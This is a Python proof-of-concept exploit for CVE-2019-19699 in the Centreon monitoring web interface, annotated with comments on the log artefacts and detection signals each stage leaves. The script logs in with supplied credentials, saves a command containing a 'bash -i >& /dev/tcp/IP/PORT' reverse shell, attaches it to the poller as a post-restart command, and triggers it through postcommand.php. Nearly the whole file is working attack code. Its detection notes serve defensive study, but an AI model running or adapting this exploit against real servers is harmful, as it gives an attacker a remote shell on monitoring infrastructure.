# Proof-of-concept script for CVE-2019-19699 (Centreon), annotated from a
# defender's perspective.  Every stage is an authenticated HTTP request to
# the Centreon web UI, so each one leaves a request in the web server log
# and a change in the Centreon configuration database; the stage comments
# name the endpoint used and the artefact each request leaves behind.
import requests
import re
import sys
import urllib.parse  # imported but not referenced in the visible script
import _thread  # imported but not referenced in the visible script

# Usage guard: five positional arguments are required.  The banner makes the
# prerequisite explicit -- a separate listener on IP:PORT must already be
# running before any request below is sent.
if len(sys.argv) < 6:
    print("Script by TheCyberGeek")
    print("Discovered by SpengeSec & TheCyberGeek")
    print("Start Listener before starting this exploit!")
    print("")
    print("Usage:\tpython3 CVE-2019-19699.py URL USER PASS IP PORT")
    print("Ex:\tpython3 CVE-2019-19699.py http://10.0.0.2/centreon admin centreon 10.0.0.1 4444")
    sys.exit(0)
else:
    base_path, username, password, ip, port = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5]

print("Script by TheCyberGeek")
print("Discovered by SpengeSec & TheCyberGeek")
print("Start Listener before starting this exploit!")

# A single session carries the login cookie through every later request, so
# in the access/application logs the whole chain appears under one
# authenticated user -- the account whose credentials were supplied above.
s = requests.Session()

# Stage 1: authenticate.  The CSRF token (centreon_token) is scraped from the
# login page and replayed together with the credentials.  Success is detected
# by the SPA placeholder text that index.php serves once a session exists.
f = s.get(base_path + "/index.php")
token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1)
f = s.post(base_path + "/index.php", data={"useralias": username, "password": password, "centreon_token": token, "submitLogin": "Connect"})
if "You need to enable JavaScript to run this app" in f.text:
    print("Logged in!")
    # Stage 2: the "add command" form (main.get.php, p=60803) is fetched for a
    # fresh token and then submitted.  Artefact: a Centreon command named
    # "shell" whose command_line is an interactive bash redirected to IP:PORT.
    # Detection: alerting on command definitions that contain "/dev/tcp/" or
    # "bash -i" in the commands table catches this stage regardless of how
    # the request was delivered.
    f = s.get(base_path + "/main.get.php?p=60803&o=a&type=3")
    token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1)
    if token:
        f = s.post(base_path + "/main.get.php?p=60803&type=3", data={"command_name": "shell", "command_type[command_type]": "3", "command_line": "bash -i >& /dev/tcp/" + ip + "/" + port + " 0>&1".format(ip,port), "resource": "$CENTREONPLUGINS$", "plugins": "/Centreon/SNMP", "macros": "$ADMINEMAIL$", "command_example": "", "listOfArg": "", "listOfMacros": "", "connectors": "", "graph_id": "", "command_activate[command_activate]": "1", "command_comment": "", "submitA": "Save", "command_id": "", "type": "3", "o": "a", "centreon_token": token})
        # Success check is only that the command name echoes back in the
        # response body.
        if "shell" in f.text:
            print("Great. Post-restart command has been saved!")
            # Stage 3: the poller configuration form (p=60901, server_id=1) is
            # resubmitted with the stored command attached as a post-restart
            # command (pollercmd[0]); the remaining fields replay the default
            # "Central" poller settings.  Artefact: the poller record with
            # id=1 now references the new command -- a diff of poller settings
            # against a known-good baseline shows the change.
            s.get(base_path + "/main.get.php?p=60901&o=c&server_id=1")
            token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1)
            if token:
                # You may need to change pollercmd[0] to your sessions ID.
                f = s.post(base_path + "/main.get.php?p=60901", data={"name": "Central", "ns_ip_address": "127.0.0.1", "localhost[localhost]": "1", "is_default[is_default]": "1", "ssh_port": "22", "engine_start_command": "service centengine start", "engine_stop_command": "service centengine stop","engine_restart_command": "service centengine restart", "engine_reload_command": "service centengine reload", "nagios_bin": "/usr/sbin/centengine","nagiostats_bin": "/usr/sbin/centenginestats","nagios_perfdata": "/var/log/centreon-engine/service-perfdata", "broker_reload_command": "service cbd reload", "centreonbroker_cfg_path": "/etc/centreon-broker", "centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker", "centreonbroker_logs_path": "", "centreonconnector_path": "/usr/lib64/centreon-connector", "init_script_centreontrapd": "centreontrapd", "snmp_trapd_path_conf": "/etc/snmp/centreon_traps/", "pollercmd[0]":"188", "clone_order_pollercmd_0": "","ns_activate[ns_activate]": "1", "submitC": "Save", "id": "1", "o": "c", "centreon_token": token})
                print("Saved the post-restart command in poller configuration!")
                # Stage 4: the poller export page (main.php, p=60902) is
                # fetched for a token, then postcommand.php is POSTed for
                # poller 1.  The request uses a near-zero timeout and swallows
                # ReadTimeout, so the script never waits for the server's
                # answer; the "Shell received" message is printed before the
                # request is even sent, on the assumption that the export
                # runs the stored post-restart command.  Detection: a
                # postcommand.php call in the access log shortly after a
                # change to the commands table is the pivot point to look for.
                s.get(base_path + "/main.php?p=60902&poller=1")
                token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1)
                if token:
                    try:
                        print("[ + ] Shell received. Check your listener!")
                        f = s.post(base_path + """/include/configuration/configGenerate/xml/postcommand.php""", data={"poller": "1"}, timeout=0.0000000001)
                    except requests.exceptions.ReadTimeout:
                        # Expected: the timeout above is deliberately too short
                        # for any real response.
                        pass
                else:
                    print("Couldn't get token for poller export page...")
            else:
                print("Could not find token for poller configuration page...")
        else:
            print("Failed to upload command...")
    else:
        print("Failed to grab token for command execution page...")
else:
    print("Cannot login to Centreon...")